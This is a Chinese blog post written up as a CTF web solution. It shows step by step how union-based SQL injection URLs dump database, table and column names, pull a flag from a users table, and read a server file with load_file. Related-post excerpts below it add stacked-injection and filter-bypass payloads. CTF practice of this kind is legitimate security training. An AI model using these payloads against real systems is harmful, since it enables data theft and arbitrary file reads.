easy_sql

最新推荐文章于 2025-05-07 21:06:26 发布
最新推荐文章于 2025-05-07 21:06:26 发布
阅读量600 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 安全 CTF WEB安全 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/satasun/article/details/115870173

easy_sql

判断注入类型(字符型注入/数字型输入)

http://hwserver.bi0x.cn:8302/?id=1 and 1=1#

发现是数字型注入

判断字段数

http://hwserver.bi0x.cn:8302/?id=1 order by 3#

判断注入点

http://hwserver.bi0x.cn:8302/?id=0 union select 1,2,3#

1 2 3都是注入点

爆库名

http://hwserver.bi0x.cn:8302/?id=0 union select database(),2,3#

库名是ctf , 接下来爆表名

爆表名

http://hwserver.bi0x.cn:8302/?id=0 union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database()#

表名如下:emails,referers,uagents,users

爆字段名

http://hwserver.bi0x.cn:8302/?id=0 union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

这里选择爆users表的字段,因为一般来说用户名密码才是数据库中最重要的资料。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MTKTGoTN-1618825320148)(C:\Users\12751\AppData\Roaming\Typora\typora-user-images\1618735710786.png)]

这里爆出字段名如下:id,username,password,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS

爆字段内容

http://hwserver.bi0x.cn:8302/?id=0 union select group_concat(password),2,3 from users#

这里爆出来flag:flag{this_is_easy_SQL}

然后得到另一个线索:flag in /flag

也就是说另外一个flag藏在数据库以外,需要使用mysql的函数去读取服务器文件。

读取文件

http://hwserver.bi0x.cn:8302/?id=0 union select load_file('/flag'),2,3#

flag:flag{th1s_1s_a_l1tt1e_h4rd_Sq1_f1ag}

完结撒花~

【网络安全 | CTF】攻防世界 very_easy_sql 解题详析(gopher协议+ssrf漏洞sql注入+盲注脚本)
等风来
08-01 1万+
登录处直接注入会提示you are not an inner user, so we can not let you have identify~查看源代码发现use.php,访问后猜测该题为基于ssrf漏洞的sql注入:因此我们可构造含有gopher协议的盲注脚本,通过对use.php界面发送请求来获取flag。具体实现的方法是通过构造不同的poc来进行注入攻击,并利用时间延迟判断是否成功注入。
[SWPUCTF 2021 新生赛]easy_sql - 联合注入||报错注入||sqlmap
oZuoShen123的博客
10-06 1225
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
简易SQL----Easy
09-07
简单化SQL增删改查,支持Access数据库。 可复制粘贴字段,方便写SQL语句。
very_easy_sql(SSRF+SQL注入)
最新发布
2302_81650222的博客
05-07 480
you are not an inner user, so we can not let you have identify~(你不是内部用户,所以我们不能让你进行身份验证)联想到可能存在SSRF漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正是因为请求是由服务器发起的,所以服务器能请求到与自身相连而与外网隔离的内部系统),所以根据提示内容会想到SSRF漏洞。分析报错信息:看\斜杠后面跟着的字符,是什么字符,它的闭合字符就是什么,若是没有,就为数字型。在\后面为'),所以闭合方式为'),
Easy SQL
2301_76723924的博客
04-12 1195
输入用户名:1 密码:1″时,没有发生SQL语句报错,即没有产生报错信息,只是提示我们输入的值是不对的(提示”Input your username and password”),说明这里注入双引号并没有使sql语句报错,因此我们可以先假设SQL语句闭合方式是单引号。如果闭合后形成的sql语句是错误的,那么sql语句执行就会错误,从而造成页面显示错误。结合实际尝试,我们输入1″ 1的时候没有报错,输入1′ 1的时候返回了报错信息,逆着推说明假设是成立的,可以推出SQL语句闭合方式是单引号。
Easysql
weixin_43610673的博客
03-04 801
无in注表名 无union select和字段名注数据 Fuzz测试过滤的关键词有: union *** select join information_schema in or and sleep benchmark if sys.schema_auto_increment_columns 因为过滤了in所以常用查询表名的方法不能用了 常用:information_schema,mysql.i...
[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析
2301_79326813的博客
02-10 1099
注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。得到数据库名称就可以按顺序数据库-表-列来找flag了。有提示,参数是wllm,并且要我们输入点东西。从上图看应该是字符型漏洞,单引号字符注入。所以,我们尝试以get方式传入。报错了,说明字段数是3。有回显,但似乎没啥用。
攻防世界 -- very_easy_sql
weixin_48031371的博客
09-14 8061
攻防世界 -- very_easy_sql
[SWPUCTF 2021 新生赛]easy_sql
zoixsoadji的博客
05-06 1576
感谢平台Nssctf 进入题目,说是让我们输入点东西,f12打开源代码,发现要求我们传的参数是wllm 那么我们就传入一个wllm=1,发现有注入点 先查看有几个库:?wllm=-1' order by 1--+ ?wllm=-1' order by 2--+ ?wllm=-1' order by 3--+ 接下来查回显:?wllm=union select 1,2,3--+ 看到回显位是2,3,查库名:?wllm=-1' union select 1,2,databas.
easysql插件
02-24
eclipse的插件
【NSSCTF】easy-sql
2301_80115024的博客
04-21 666
(之前做过类似题,就扒拉了一下题库,又找到了这一题练练手)先查看回显参数 /?wllm=1 如图判断字段数 /?wllm=-1' order by 3--+ /?wllm=-1' order by 4--+查询4时出现如图情况,因此有3个显示位查回显 /?wllm=-1' union select 1,2,3--+查表名 /?wllm=-1' union select 1,2,group_concat(table_name) f
easy_sql解析
qq_73722777的博客
03-08 568
获得列名,但是其中不包含flag项。先尝试打开username和password列查看数据。进入页面,我们看到网页标题为管理员后台,尝试使用万能密码进行登录。回显输入为3时可以正常登录,回显为4显示错误,推测回显位为3。登录后发现登录成功,网页有回显,尝试进行sql注入。网址回显错误,猜测空格被屏蔽,使用/**/代替尝试。获得表名为bighacker,users。爆数据后未发现flag,于是尝试从另一个表入手。获得库名为yunxi_exam,进行爆表名。获得flag,此题结束。得到列名,尝试爆数据。
[强网杯]easy_sql
fightte的博客
05-17 1133
提交1和2会回显一个数组: 相当于1对应的值为“hahahah” 是key-value形式的输出。 尝试输入1’.返回报错,有注入漏洞 尝试1’or 1=1#,并用#截断,输出了三个数组: 尝试堆叠注入,即注入多组sql语句,其中有;隔开, 输入show databases返回了所有的数据表, 尝试查询表名:show tables; 显示了表的名字,在使用sql语句,show columns from xx,来查询其中列的名称: 上图是word的列名, 下图,再查出1919…中的列名: 用sql
ISCC,WebEasy-SQL
Pai_Space
05-25 2654
select 等被过滤,绕不过 id=1 至 8 有一些信息 id=8 时 用 sqlmap 可以查到数据库是 Mysql 8 Mysql 8 存在 table 注入 浅谈利用mysql8新特性进行SQL注入 - 安全客,安全资讯平台 测是否存在 http://59.110.159.206:7010/?id=-1 union table users limit 0,1 存在,可以利用,由于 id=8 时提示查邮件,看看是否存在 email 回显了 email,查 b
攻防世界web新手 - very_easy_sql(非常详细的wp)
热门推荐
yuanxu8877的博客
11-27 1万+
攻防世界web新手 - very_easy_sql(非常详细的wp),希望大家不要吝啬您的点赞收藏哦。
nssctf easy_sql
03-17
<think>嗯,用户正在寻找NSSCTF比赛中easy_sql题目的解法或提示。首先,我需要回忆一下之前处理的类似题目,比如强网杯2019的easy_sql或者SWPUCTF 2021的题目。这些题目通常涉及SQL注入,尤其是堆叠注入,因为用户提供的引用中有提到堆叠注入和手工注入的必要性。 用户提供的引用里提到sqlmap可能不适用,因为题目注释中有“sqlmap是没有灵魂的”,这可能意味着过滤了某些自动化工具的特征,需要手动注入。另外,引用3中的示例使用了联合查询和group_concat来获取表名,这可能是一个线索。 接下来,我需要考虑常见的解题步骤。首先,测试注入点,判断是否存在字符型或数字型注入。然后,尝试堆叠注入,因为题目名称中有“easy_sql”,可能允许执行多条语句。例如,用户提到的使用union select来获取表名和列名,进而dump数据。 还要注意是否有过滤,比如某些关键词被过滤,可能需要大小写绕过或者注释符的使用。例如,使用`-1'`来闭合前面的查询,然后执行union select,最后用`--`注释掉剩余部分。 此外,引用的WriteUp中提到查看源码可能有帮助,比如发现注释中的提示,如use.php,可能需要添加到URL中进行测试。因此,检查页面源代码是重要的一步,可能发现隐藏的提示或注入点。 最后,可能需要利用information_schema数据库来获取表结构和数据,如查询tables和columns表。然后通过联合查询将数据输出到页面上。如果遇到过滤,可能需要尝试不同的绕过方法,比如使用反引号、编码或者分块传输。 总结步骤应该是:确定注入类型,测试堆叠注入是否可行,获取数据库和表信息,最后提取flag。同时注意绕过可能的过滤机制,并利用题目提供的注释或提示。</think>### NSSCTF easy_sql 解题思路 根据题目描述和引用信息,该题属于SQL注入类题型,可能涉及堆叠注入(Stacked Queries)或联合查询。以下是分步解析: --- #### 1. **判断注入类型** - 测试参数是否存在字符型或数字型注入: ```http /?wllm=1' -- 测试字符型闭合 /?wllm=1 and 1=1 -- 测试数字型逻辑 ``` 若页面返回差异,说明存在注入点[^2][^3]。 --- #### 2. **尝试堆叠注入** 引用[2][^2]提到该题适合手工注入,且可能支持堆叠注入: ```http /?wllm=1'; show databases; -- ``` 若返回数据库列表,则确认堆叠注入可用。 --- #### 3. **获取数据库和表名** 通过联合查询或`information_schema`获取元数据: ```http /?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'-- ``` 此处引用[3][^3]显示表名可能为`test_tb`,列名需进一步探测。 --- #### 4. **提取数据** 若已知表名和列名,直接查询目标数据: ```http /?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'-- ``` 最终通过`--dump`或联合查询获取flag: ```http /?wllm=-1' union select 1,2,flag from test_tb-- ``` --- #### 5. **绕过过滤** 若遇到关键词过滤,尝试以下方法: - 使用`/**/`替代空格 - 大小写混合(如`UnIoN`) - 十六进制编码表名 --- ### 关键代码示例 ```python # 手工构造Payload示例(需根据实际过滤调整) payload = "-1' union select 1,2,group_concat(flag) from test_tb-- " url = f"http://target-site/?wllm={payload}" ``` ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值